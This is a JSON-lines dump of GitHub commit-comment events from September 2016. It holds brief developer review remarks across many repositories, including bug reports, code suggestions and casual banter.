{"id":"4615231251","type":"CommitCommentEvent","actor":{"login":"nice3277"},"repo":{"name":"nice3277/yusin"},"payload":{"comment":{"id":19166247,"position":null,"line":null,"path":null,"commit_id":"a32a29059d2f2f43aab1f73209fd55eb1ade3d86","created_at":"2016-09-26T00:35:36Z","updated_at":"2016-09-26T00:35:36Z","body":"123"}},"created_at":"2016-09-26T00:35:36Z"}
{"id":"4615231731","type":"CommitCommentEvent","actor":{"login":"balsdorf"},"repo":{"name":"eventum/eventum"},"payload":{"comment":{"id":19166248,"position":12,"line":50,"path":"templates/include/dropzone.tpl.html","commit_id":"1a7873d1c884ab31285afc9c881b5225033a0abe","created_at":"2016-09-26T00:35:56Z","updated_at":"2016-09-26T00:35:56Z","body":"Nope!"}},"created_at":"2016-09-26T00:35:56Z"}
{"id":"4615232721","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19166251,"position":null,"line":null,"path":null,"commit_id":"8a4a8a30358e958b3cf93a957730829fd1b8d1fc","created_at":"2016-09-26T00:36:37Z","updated_at":"2016-09-26T00:36:37Z","body":"а можно поподробнее что это вообще такое?"}},"created_at":"2016-09-26T00:36:37Z"}
{"id":"4615234311","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19166254,"position":null,"line":null,"path":null,"commit_id":"78ab22c81d13b4dc491855f6e4c647429c6c4b1d","created_at":"2016-09-26T00:37:40Z","updated_at":"2016-09-26T00:37:40Z","body":"Change your density to 420. Then your screen width will be almost exactly 410dip."}},"created_at":"2016-09-26T00:37:40Z"}
{"id":"4615236841","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19166262,"position":null,"line":null,"path":null,"commit_id":"98d0f8164ba95a66e13df8dcdb982ba86af0126d","created_at":"2016-09-26T00:39:22Z","updated_at":"2016-09-26T00:39:22Z","body":"у них же есть норм кнопки"}},"created_at":"2016-09-26T00:39:22Z"}
{"id":"4615246716","type":"CommitCommentEvent","actor":{"login":"freiheit"},"repo":{"name":"HearthSim/discord_rss_bot"},"payload":{"comment":{"id":19166286,"position":null,"line":null,"path":null,"commit_id":"dc86fd1fcb3a866c18b423268ceb7e352f2a553b","created_at":"2016-09-26T00:45:34Z","updated_at":"2016-09-26T00:45:34Z","body":"Well, it means it's a change I'm not willing to pull into my main codebase. I've been improving things, adding features, merging in features from others, etc. This change makes it harder for you to pull any of that stuff in."}},"created_at":"2016-09-26T00:45:34Z"}
{"id":"4615248215","type":"CommitCommentEvent","actor":{"login":"Dannyweigel24"},"repo":{"name":"fastlane/fastlane"},"payload":{"comment":{"id":19166288,"position":null,"line":null,"path":null,"commit_id":"af9976cabf26180c33b2b2450100410fc48fa35a","created_at":"2016-09-26T00:46:36Z","updated_at":"2016-09-26T00:46:36Z","body":"[tmp_7249-Android Protips: The Code Snippets-1673605425.pdf](https://github.com/fastlane/fastlane/files/492006/tmp_7249-Android.Protips.The.Code.Snippets-1673605425.pdf)\r\n"}},"created_at":"2016-09-26T00:46:36Z"}
{"id":"4615248436","type":"CommitCommentEvent","actor":{"login":"CoderCY30"},"repo":{"name":"CoderCY30/test"},"payload":{"comment":{"id":19166290,"position":null,"line":null,"path":null,"commit_id":"039bda6084e4d7e9a0614e6a8048a0efc29ee09b","created_at":"2016-09-26T00:46:46Z","updated_at":"2016-09-26T00:46:46Z","body":"a"}},"created_at":"2016-09-26T00:46:46Z"}
{"id":"4615252037","type":"CommitCommentEvent","actor":{"login":"LeoJY"},"repo":{"name":"LeoJY/library_room"},"payload":{"comment":{"id":19166295,"position":null,"line":null,"path":null,"commit_id":"469a40f52bba48a95473319e08c6e5427848c2a1","created_at":"2016-09-26T00:49:05Z","updated_at":"2016-09-26T00:49:05Z","body":"fix the search showing authorization"}},"created_at":"2016-09-26T00:49:05Z"}
{"id":"4615253602","type":"CommitCommentEvent","actor":{"login":"jleclanche"},"repo":{"name":"HearthSim/discord_rss_bot"},"payload":{"comment":{"id":19166297,"position":null,"line":null,"path":null,"commit_id":"dc86fd1fcb3a866c18b423268ceb7e352f2a553b","created_at":"2016-09-26T00:50:09Z","updated_at":"2016-09-26T00:50:09Z","body":"@freiheit Sorry, I didn't notice you were the original author. I didn't expect the original fork to still be maintained, which is why I didn't PR this (nor would I have PR'd a stylistic change anyway).\r\n\r\nAnyway, tabs follow [the HearthSim styleguide](https://hearthsim.info/styleguide/). We're not really using the bot anymore though."}},"created_at":"2016-09-26T00:50:09Z"}
{"id":"4615254997","type":"CommitCommentEvent","actor":{"login":"aaryllins"},"repo":{"name":"aaryllins/html-validation-fixes"},"payload":{"comment":{"id":19166300,"position":null,"line":null,"path":null,"commit_id":"98641fd3169f6bfdd72971879eebcb0cc84bff49","created_at":"2016-09-26T00:51:01Z","updated_at":"2016-09-26T00:51:01Z","body":"Yes sir!"}},"created_at":"2016-09-26T00:51:01Z"}
{"id":"4615257148","type":"CommitCommentEvent","actor":{"login":"puellanivis"},"repo":{"name":"soheilhy/cmux"},"payload":{"comment":{"id":19166303,"position":null,"line":null,"path":null,"commit_id":"dce0a82f2395e814f7b1af6f8d07d6b8bce0aec7","created_at":"2016-09-26T00:52:20Z","updated_at":"2016-09-26T00:52:20Z","body":"I'm highly confused as to why this isn't just using most of the `bytes.Buffer` already.\r\n\r\nI mean, yes, it returns `io.EOF` on an empty buffer, but you can test for that, and then just go and read more from the source, right?"}},"created_at":"2016-09-26T00:52:20Z"}
{"id":"4615257961","type":"CommitCommentEvent","actor":{"login":"leodenault"},"repo":{"name":"leodenault/Believe"},"payload":{"comment":{"id":19166304,"position":null,"line":null,"path":null,"commit_id":"70f7a0e5ae7744288268332e3a799ef5d3b5aab4","created_at":"2016-09-26T00:52:50Z","updated_at":"2016-09-26T00:52:50Z","body":"Fixes #5."}},"created_at":"2016-09-26T00:52:50Z"}
{"id":"4615260485","type":"CommitCommentEvent","actor":{"login":"bjourne"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19166308,"position":null,"line":null,"path":null,"commit_id":"e32e45e59062ba4c9c75415c11ed81f069d8302f","created_at":"2016-09-26T00:54:24Z","updated_at":"2016-09-26T00:54:24Z","body":"I didn't know it was that easy. I'll fix it to use that way soon."}},"created_at":"2016-09-26T00:54:24Z"}
{"id":"4615262292","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19166311,"position":null,"line":null,"path":null,"commit_id":"89dce509219f896b78e633c4e6f4ab2a8d5c40bb","created_at":"2016-09-26T00:55:31Z","updated_at":"2016-09-26T00:55:31Z","body":"Look at this, I implemented a lighting system! (No support for day/night light yet though) The dirt is producing light. https://gyazo.com/2e9ab5239c3cf6345e2184f1b146aa9c (Btw if you didn't know you can take screenshots with f2)"}},"created_at":"2016-09-26T00:55:31Z"}
{"id":"4615266730","type":"CommitCommentEvent","actor":{"login":"dzhuang"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19166320,"position":null,"line":null,"path":null,"commit_id":"d8644cb14bd88416beb0523cdd7bf79b2510fd2b","created_at":"2016-09-26T00:58:18Z","updated_at":"2016-09-26T00:58:18Z","body":"Opps..."}},"created_at":"2016-09-26T00:58:18Z"}
{"id":"4615267518","type":"CommitCommentEvent","actor":{"login":"dzhuang"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19166323,"position":5,"line":454,"path":"course/auth.py","commit_id":"d8644cb14bd88416beb0523cdd7bf79b2510fd2b","created_at":"2016-09-26T00:58:48Z","updated_at":"2016-09-26T00:58:48Z","body":"There's a typo."}},"created_at":"2016-09-26T00:58:48Z"}
{"id":"4615268431","type":"CommitCommentEvent","actor":{"login":"mallorybobalice"},"repo":{"name":"spender-sandbox/cuckoomon-modified"},"payload":{"comment":{"id":19166327,"position":null,"line":null,"path":null,"commit_id":"db1765ea9a5423ece39ac2cacec410d815312cf8","created_at":"2016-09-26T00:59:22Z","updated_at":"2016-09-26T00:59:22Z","body":"=) please merge in a binary cuckoomon set from this commit into cuckoo-modified? (for the vc++ ide compile it ourselves impaired) "}},"created_at":"2016-09-26T00:59:22Z"}
{"id":"4615270870","type":"CommitCommentEvent","actor":{"login":"thel3l"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19166332,"position":null,"line":null,"path":null,"commit_id":"6686ff82f32bcb36ea1791476df9544a03bba14b","created_at":"2016-09-26T01:00:40Z","updated_at":"2016-09-26T01:00:40Z","body":"It break something?"}},"created_at":"2016-09-26T01:00:40Z"}
{"id":"4615271379","type":"CommitCommentEvent","actor":{"login":"puellanivis"},"repo":{"name":"soheilhy/cmux"},"payload":{"comment":{"id":19166335,"position":null,"line":null,"path":null,"commit_id":"dce0a82f2395e814f7b1af6f8d07d6b8bce0aec7","created_at":"2016-09-26T01:00:57Z","updated_at":"2016-09-26T01:00:57Z","body":"In fact, TeeReader doesn't do any allocation either… it's exactly like the code you have here…"}},"created_at":"2016-09-26T01:00:57Z"}
{"id":"4615271638","type":"CommitCommentEvent","actor":{"login":"pedrommone"},"repo":{"name":"codecasts/codecasts"},"payload":{"comment":{"id":19166336,"position":16,"line":16,"path":"app/Domains/Podcasts/Listeners/IncrementsTimesDownloaded.php","commit_id":"5ecb9e6f2b692d2f47804b199c2c9c10cc8f0fcc","created_at":"2016-09-26T01:01:06Z","updated_at":"2016-09-26T01:01:06Z","body":"@hernandev this is not a case for increment?\r\n\r\nEg: https://laravel.com/docs/5.3/queries#increment-and-decrement"}},"created_at":"2016-09-26T01:01:06Z"}
{"id":"4615273391","type":"CommitCommentEvent","actor":{"login":"binkybear"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19166338,"position":null,"line":null,"path":null,"commit_id":"6686ff82f32bcb36ea1791476df9544a03bba14b","created_at":"2016-09-26T01:02:05Z","updated_at":"2016-09-26T01:02:05Z","body":"Running launch attack wasn't launching the attack.  Was it working for you?"}},"created_at":"2016-09-26T01:02:05Z"}
{"id":"4615273806","type":"CommitCommentEvent","actor":{"login":"HuangKBAaron"},"repo":{"name":"python-openxml/python-docx"},"payload":{"comment":{"id":19166340,"position":null,"line":null,"path":null,"commit_id":"04fd31e7b54f9ced8a30a457471b9c31815b4799","created_at":"2016-09-26T01:02:18Z","updated_at":"2016-09-26T01:02:18Z","body":"Is the code of \"header\" be merged to main?"}},"created_at":"2016-09-26T01:02:18Z"}
{"id":"4615275194","type":"CommitCommentEvent","actor":{"login":"zadragon"},"repo":{"name":"kimyk0120/test01"},"payload":{"comment":{"id":19166342,"position":null,"line":null,"path":null,"commit_id":"2a529774dd10fb11894c3ca4c287c6e7409e3699","created_at":"2016-09-26T01:03:07Z","updated_at":"2016-09-26T01:03:07Z","body":"코멘트여기"}},"created_at":"2016-09-26T01:03:07Z"}
{"id":"4615276435","type":"CommitCommentEvent","actor":{"login":"soheilhy"},"repo":{"name":"soheilhy/cmux"},"payload":{"comment":{"id":19166345,"position":null,"line":null,"path":null,"commit_id":"dce0a82f2395e814f7b1af6f8d07d6b8bce0aec7","created_at":"2016-09-26T01:03:33Z","updated_at":"2016-09-26T01:03:33Z","body":"Sorry, I'm not sure if I understand your question. This is simply to release the internal slice in `bytes.Buffer` when there is no need for it. This is a simple hack just because `bytes.Buffer` doesn't have a reset method."}},"created_at":"2016-09-26T01:03:33Z"}
{"id":"4615277752","type":"CommitCommentEvent","actor":{"login":"thel3l"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19166351,"position":null,"line":null,"path":null,"commit_id":"6686ff82f32bcb36ea1791476df9544a03bba14b","created_at":"2016-09-26T01:04:21Z","updated_at":"2016-09-26T01:04:21Z","body":"Hmm. Funnily enough, none of the hid attacks were running after I pushed a custom build to my phone. Thought it might be a bug with my device. "}},"created_at":"2016-09-26T01:04:21Z"}
{"id":"4615278991","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166356,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T01:05:00Z","updated_at":"2016-09-26T01:05:00Z","body":"Yeah but at least you got in the air. Technically you can still fly without vertical stabilizers, it just won't fly well."}},"created_at":"2016-09-26T01:05:00Z"}
{"id":"4615279017","type":"CommitCommentEvent","actor":{"login":"thel3l"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19166357,"position":null,"line":null,"path":null,"commit_id":"6686ff82f32bcb36ea1791476df9544a03bba14b","created_at":"2016-09-26T01:05:01Z","updated_at":"2016-09-26T01:05:01Z","body":"I was just poking around, trying to find the bug. "}},"created_at":"2016-09-26T01:05:01Z"}
{"id":"4615280181","type":"CommitCommentEvent","actor":{"login":"liweioffices"},"repo":{"name":"liweioffices/hello-world"},"payload":{"comment":{"id":19166362,"position":null,"line":null,"path":null,"commit_id":"d15e2a058e53b2eb95c570bcba00435d7608465d","created_at":"2016-09-26T01:05:39Z","updated_at":"2016-09-26T01:05:39Z","body":"允许合并"}},"created_at":"2016-09-26T01:05:39Z"}
{"id":"4615282504","type":"CommitCommentEvent","actor":{"login":"taishi8117"},"repo":{"name":"twitter/heron"},"payload":{"comment":{"id":19166368,"position":9,"line":299,"path":"scripts/packages/BUILD","commit_id":"0124fb31e43f5e27c20bd83064987fb2f64e66b9","created_at":"2016-09-26T01:06:59Z","updated_at":"2016-09-26T01:06:59Z","body":"`tree` is not installed on Mac OS X by default and this is not that necessary."}},"created_at":"2016-09-26T01:06:59Z"}
{"id":"4615282624","type":"CommitCommentEvent","actor":{"login":"inducer"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19166369,"position":5,"line":454,"path":"course/auth.py","commit_id":"d8644cb14bd88416beb0523cdd7bf79b2510fd2b","created_at":"2016-09-26T01:07:03Z","updated_at":"2016-09-26T01:07:03Z","body":"Thanks for spotting that. Fixed: 6aaa106."}},"created_at":"2016-09-26T01:07:03Z"}
{"id":"4615283193","type":"CommitCommentEvent","actor":{"login":"zensh"},"repo":{"name":"macacajs/macaca-cli"},"payload":{"comment":{"id":19166371,"position":null,"line":null,"path":null,"commit_id":"5032141e0a911e09d7d5a895e79292fe94b5be90","created_at":"2016-09-26T01:07:22Z","updated_at":"2016-09-26T01:07:22Z","body":"这些测试都没有跑，因为 mocha 模式下 co-mocha 并没有 require 进来。"}},"created_at":"2016-09-26T01:07:22Z"}
{"id":"4615283363","type":"CommitCommentEvent","actor":{"login":"taishi8117"},"repo":{"name":"twitter/heron"},"payload":{"comment":{"id":19166372,"position":4,"line":4,"path":"scripts/packages/pyheron/requirements.txt","commit_id":"0124fb31e43f5e27c20bd83064987fb2f64e66b9","created_at":"2016-09-26T01:07:28Z","updated_at":"2016-09-26T01:07:28Z","body":"We need to figure out a way to dynamically update the requirements for pyheron."}},"created_at":"2016-09-26T01:07:28Z"}
{"id":"4615283426","type":"CommitCommentEvent","actor":{"login":"freiheit"},"repo":{"name":"HearthSim/discord_rss_bot"},"payload":{"comment":{"id":19166374,"position":null,"line":null,"path":null,"commit_id":"dc86fd1fcb3a866c18b423268ceb7e352f2a553b","created_at":"2016-09-26T01:07:31Z","updated_at":"2016-09-26T01:07:31Z","body":"Yeah, original is still maintained and used pretty heavily. Expanded to about a dozen discords. I try to help anybody having trouble using the bot code themselves and I've even accepted a few pull requests."}},"created_at":"2016-09-26T01:07:31Z"}
{"id":"4615285266","type":"CommitCommentEvent","actor":{"login":"aoindustries"},"repo":{"name":"aoindustries/tomcat85"},"payload":{"comment":{"id":19166376,"position":null,"line":null,"path":null,"commit_id":"c4a125310a3c96c7bad6e1a359f23236378385a3","created_at":"2016-09-26T01:08:34Z","updated_at":"2016-09-26T01:08:34Z","body":"Found another concurrency bottleneck in our usage.  TagHandlerPool is a source of lock contention as well as requiring tuning to ensure adequate pool sizes.  We have added a ConcurrentTagHandlerPool that neither causes contention nor requires tuning.\r\n\r\nWe tested one of our heavier pages with a concurrency of 20 on a 4-core/8-thread CPU.  Before this change, we were limited to 29.41 requests/second at around 630% CPU utilization (of 800% possible).  After this change 33.82 requests/second at 780% CPU utilization (system maxed).  We achieved a 15% increase in throughput with about 24% increase in CPU utilization."}},"created_at":"2016-09-26T01:08:34Z"}
{"id":"4615285340","type":"CommitCommentEvent","actor":{"login":"jleclanche"},"repo":{"name":"HearthSim/discord_rss_bot"},"payload":{"comment":{"id":19166377,"position":null,"line":null,"path":null,"commit_id":"dc86fd1fcb3a866c18b423268ceb7e352f2a553b","created_at":"2016-09-26T01:08:37Z","updated_at":"2016-09-26T01:08:37Z","body":"Ok. Don't worry about this - I'll delete this fork at some point."}},"created_at":"2016-09-26T01:08:37Z"}
{"id":"4615285958","type":"CommitCommentEvent","actor":{"login":"binkybear"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19166378,"position":null,"line":null,"path":null,"commit_id":"6686ff82f32bcb36ea1791476df9544a03bba14b","created_at":"2016-09-26T01:08:59Z","updated_at":"2016-09-26T01:08:59Z","body":"Someone else mentioned it but hid is still working for me: \r\nhttps://github.com/offensive-security/nethunter-app/issues/146#issuecomment-249403936\r\n\r\nCan you see anything in logcat in Android Studio?"}},"created_at":"2016-09-26T01:08:59Z"}
{"id":"4615286496","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19166379,"position":null,"line":null,"path":null,"commit_id":"e5f9183eedf598197dd6bd84568e021893a8eb5f","created_at":"2016-09-26T01:09:18Z","updated_at":"2016-09-26T01:09:18Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (1946 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.93%25-red.svg)</a> \n"}},"created_at":"2016-09-26T01:09:18Z"}
{"id":"4615288253","type":"CommitCommentEvent","actor":{"login":"thel3l"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19166384,"position":null,"line":null,"path":null,"commit_id":"6686ff82f32bcb36ea1791476df9544a03bba14b","created_at":"2016-09-26T01:10:17Z","updated_at":"2016-09-26T01:10:17Z","body":"Right now on a mobile, but will be sure to paste a log here when I'm on a comp. "}},"created_at":"2016-09-26T01:10:17Z"}
{"id":"4615288669","type":"CommitCommentEvent","actor":{"login":"lvanok"},"repo":{"name":"lvanok/LVOK-portfolio"},"payload":{"comment":{"id":19166386,"position":null,"line":null,"path":null,"commit_id":"906e2abeddf1e974b92251fc8ce9568b846e47cb","created_at":"2016-09-26T01:10:34Z","updated_at":"2016-09-26T01:10:34Z","body":"portfolio - 1st project"}},"created_at":"2016-09-26T01:10:34Z"}
{"id":"4615289501","type":"CommitCommentEvent","actor":{"login":"taishi8117"},"repo":{"name":"twitter/heron"},"payload":{"comment":{"id":19166389,"position":4,"line":296,"path":"scripts/packages/BUILD","commit_id":"0124fb31e43f5e27c20bd83064987fb2f64e66b9","created_at":"2016-09-26T01:11:01Z","updated_at":"2016-09-26T01:11:01Z","body":"We need both `heron/common` and `heron/proto` for this library. If we move them under `pyheron`, we need to do a lot of sed to replace `import heron.(common|proto)...` and with `import pyheron.(common|proto)...`, which are pretty burdensome; so I instead moved the entire `heron/common` and `heron/proto` directories to the top level. "}},"created_at":"2016-09-26T01:11:01Z"}
{"id":"4615290760","type":"CommitCommentEvent","actor":{"login":"IsaiahPatton"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19166390,"position":null,"line":null,"path":null,"commit_id":"89dce509219f896b78e633c4e6f4ab2a8d5c40bb","created_at":"2016-09-26T01:11:48Z","updated_at":"2016-09-26T01:11:48Z","body":"This will work for both linux and widows:\r\n\r\npublic static String getGamePath() {\r\n    \treturn System.getProperty(\"user.home\") + File.separator + \"GLCraft\"  + File.separator;\r\n\t\t}"}},"created_at":"2016-09-26T01:11:48Z"}
{"id":"4615291554","type":"CommitCommentEvent","actor":{"login":"codemillmatt"},"repo":{"name":"jamesmontemagno/SettingsPlugin"},"payload":{"comment":{"id":19166392,"position":94,"line":316,"path":"src/Plugin.Settings.Android/Settings.cs","commit_id":"e3544af648d11fe2e9752f90d49be0d588fdd95a","created_at":"2016-09-26T01:12:16Z","updated_at":"2016-09-26T01:12:16Z","body":"Update name to `GetSharedPreference`"}},"created_at":"2016-09-26T01:12:16Z"}
{"id":"4615292040","type":"CommitCommentEvent","actor":{"login":"SamuelWN"},"repo":{"name":"SamuelWN/Scripts"},"payload":{"comment":{"id":19166394,"position":null,"line":null,"path":null,"commit_id":"e3ffe5472757b29b2c23f3c616fb258119cc94dd","created_at":"2016-09-26T01:12:31Z","updated_at":"2016-09-26T01:12:31Z","body":"While the previous commit does preserve the cover art information, it converts it to a video stream rather than metadata.\r\nSolution is a bit of a bodge, but by using `mediainfo` and `AtomicParsely` one is able to detect, extract, and insert the artwork after transcoding.\r\n"}},"created_at":"2016-09-26T01:12:31Z"}
{"id":"4615293973","type":"CommitCommentEvent","actor":{"login":"codemillmatt"},"repo":{"name":"jamesmontemagno/SettingsPlugin"},"payload":{"comment":{"id":19166397,"position":96,"line":205,"path":"src/Plugin.Settings.iOSUnified/Settings.cs","commit_id":"e3544af648d11fe2e9752f90d49be0d588fdd95a","created_at":"2016-09-26T01:13:36Z","updated_at":"2016-09-26T01:13:36Z","body":"Could be deleted"}},"created_at":"2016-09-26T01:13:36Z"}
{"id":"4615294770","type":"CommitCommentEvent","actor":{"login":"freiheit"},"repo":{"name":"4yn/discord_rss_bot"},"payload":{"comment":{"id":19166402,"position":null,"line":null,"path":null,"commit_id":"a77333be015e53675e95a95d376e530c144d2235","created_at":"2016-09-26T01:14:05Z","updated_at":"2016-09-26T01:14:05Z","body":"FYI, I pulled all this stuff into the main code...  The config is \"filter\" instead of \"regex\". Also added an exclude filter, filters can be set per-feed or per-room, and the field being filtered on can be set to anything (not just title)."}},"created_at":"2016-09-26T01:14:05Z"}
{"id":"4615300825","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"MWiss/Sorasu"},"payload":{"comment":{"id":19166412,"position":27,"line":27,"path":"scripts/main.py","commit_id":"f2f4eb7ccb90fcc5c6ebed402919f80f1fa6625e","created_at":"2016-09-26T01:17:24Z","updated_at":"2016-09-26T01:17:24Z","body":"Your comment is incorrect. Milliseconds/100 gets you tenths of seconds. Divide by 1000 to get seconds :-p."}},"created_at":"2016-09-26T01:17:24Z"}
{"id":"4615301496","type":"CommitCommentEvent","actor":{"login":"joonyoung23"},"repo":{"name":"joonyoung23/class4"},"payload":{"comment":{"id":19166414,"position":null,"line":null,"path":null,"commit_id":"ca4522a310b8926d59d89f35f0ac0f1a3c7ec45b","created_at":"2016-09-26T01:17:46Z","updated_at":"2016-09-26T01:17:46Z","body":"Resubmitting just in case"}},"created_at":"2016-09-26T01:17:46Z"}
{"id":"4615303660","type":"CommitCommentEvent","actor":{"login":"mattfenwick"},"repo":{"name":"mattfenwick/UnParse-js"},"payload":{"comment":{"id":19166416,"position":null,"line":null,"path":null,"commit_id":"308c918460d4726a9ff58c61daf0d5a486386992","created_at":"2016-09-26T01:18:55Z","updated_at":"2016-09-26T01:18:55Z","body":"This is for #23 , not 18."}},"created_at":"2016-09-26T01:18:55Z"}
{"id":"4615303891","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"MWiss/Sorasu"},"payload":{"comment":{"id":19166418,"position":31,"line":31,"path":"scripts/player.py","commit_id":"f2f4eb7ccb90fcc5c6ebed402919f80f1fa6625e","created_at":"2016-09-26T01:19:03Z","updated_at":"2016-09-26T01:19:03Z","body":"`self.vel.y += 1`, etc., is disregarding `deltaTime`. You will notice that this causes weird effects if you change around your framerate cap."}},"created_at":"2016-09-26T01:19:03Z"}
{"id":"4615305274","type":"CommitCommentEvent","actor":{"login":"codemillmatt"},"repo":{"name":"jamesmontemagno/SettingsPlugin"},"payload":{"comment":{"id":19166423,"position":116,"line":155,"path":"src/Plugin.Settings.WindowsPhone81/Settings.cs","commit_id":"e3544af648d11fe2e9752f90d49be0d588fdd95a","created_at":"2016-09-26T01:19:51Z","updated_at":"2016-09-26T01:19:51Z","body":"Is this `CreateContainer` needed? I think the line below will take care of creating the key/value combo..."}},"created_at":"2016-09-26T01:19:51Z"}
{"id":"4615305558","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19166424,"position":null,"line":null,"path":null,"commit_id":"309655a5e1e960f6af9ac43dfc50bbd79ab95c05","created_at":"2016-09-26T01:20:01Z","updated_at":"2016-09-26T01:20:01Z","body":"❤️ "}},"created_at":"2016-09-26T01:20:01Z"}
{"id":"4615306720","type":"CommitCommentEvent","actor":{"login":"zensh"},"repo":{"name":"macacajs/macaca-cli"},"payload":{"comment":{"id":19166428,"position":null,"line":null,"path":null,"commit_id":"5032141e0a911e09d7d5a895e79292fe94b5be90","created_at":"2016-09-26T01:20:36Z","updated_at":"2016-09-26T01:20:36Z","body":"额，当前是直接用 mocha 跑的有 co-mocha。\r\n我改成了 `./bin/macaca-cli run -d test`，macaca 自测，才没有 require co-mocha。"}},"created_at":"2016-09-26T01:20:36Z"}
{"id":"4615310920","type":"CommitCommentEvent","actor":{"login":"mcraeklaura"},"repo":{"name":"mcraeklaura/CST336Lab3"},"payload":{"comment":{"id":19166435,"position":62,"line":230,"path":"main.php","commit_id":"8ed38a92785e609ea05d2d962bf8573c74478046","created_at":"2016-09-26T01:22:50Z","updated_at":"2016-09-26T01:22:50Z","body":"ADD"}},"created_at":"2016-09-26T01:22:50Z"}
{"id":"4615312246","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166439,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T01:23:28Z","updated_at":"2016-09-26T01:23:28Z","body":"Well, \"it just won't fly well\" is a bit of an understatement. There have been serious accidents due to the loss of the vertical stabilizer. There has, however, been a case of a B-52 landing with a lost vertical stabilizer, in 1964. Anyway, I don't think you would be happy to be on such a flight."}},"created_at":"2016-09-26T01:23:28Z"}
{"id":"4615312712","type":"CommitCommentEvent","actor":{"login":"mcraeklaura"},"repo":{"name":"mcraeklaura/CST336Lab3"},"payload":{"comment":{"id":19166441,"position":80,"line":246,"path":"main.php","commit_id":"8ed38a92785e609ea05d2d962bf8573c74478046","created_at":"2016-09-26T01:23:42Z","updated_at":"2016-09-26T01:23:42Z","body":"ADD\r\n"}},"created_at":"2016-09-26T01:23:42Z"}
{"id":"4615314042","type":"CommitCommentEvent","actor":{"login":"yesCurtis"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19166444,"position":null,"line":null,"path":null,"commit_id":"bac76b4d3ab48d9830a76235792e02011e28259b","created_at":"2016-09-26T01:24:24Z","updated_at":"2016-09-26T01:24:24Z","body":"thank you so much for this! been waiting awhile for it! so annoying using normal map for it!"}},"created_at":"2016-09-26T01:24:24Z"}
{"id":"4615315688","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166446,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T01:25:16Z","updated_at":"2016-09-26T01:25:16Z","body":"Well let's see, the purpose of the plane is to fly. The purpose of the main method is to run the program. The other stuff is just extra. Who needs vertical stabilizers...."}},"created_at":"2016-09-26T01:25:16Z"}
{"id":"4615321286","type":"CommitCommentEvent","actor":{"login":"fcard"},"repo":{"name":"JuliaLang/METADATA.jl"},"payload":{"comment":{"id":19166457,"position":19,"line":19,"path":".test/check-pr.jl","commit_id":"fef1c469647c3b8000ef15bdf0d55035c4194fde","created_at":"2016-09-26T01:28:11Z","updated_at":"2016-09-26T01:28:11Z","body":"Just saw the fix being merged. Tests a-working now, thanks! Very appreciated! :)"}},"created_at":"2016-09-26T01:28:11Z"}
{"id":"4615322240","type":"CommitCommentEvent","actor":{"login":"zenspider"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19166460,"position":null,"line":null,"path":null,"commit_id":"c9dd5918f40dc6df3a237f634b9689bfbb591662","created_at":"2016-09-26T01:28:43Z","updated_at":"2016-09-26T01:28:43Z","body":"Shit. It escaped me as I got distracted by other projects... sec..."}},"created_at":"2016-09-26T01:28:43Z"}
{"id":"4615324091","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JunoLab/CodeTools.jl"},"payload":{"comment":{"id":19166463,"position":9,"line":6,"path":".travis.yml","commit_id":"aa835b5fdb44ac0b40366a2973d2cbfe762195b8","created_at":"2016-09-26T01:29:46Z","updated_at":"2016-09-26T01:29:46Z","body":"worth also running nightly?"}},"created_at":"2016-09-26T01:29:46Z"}
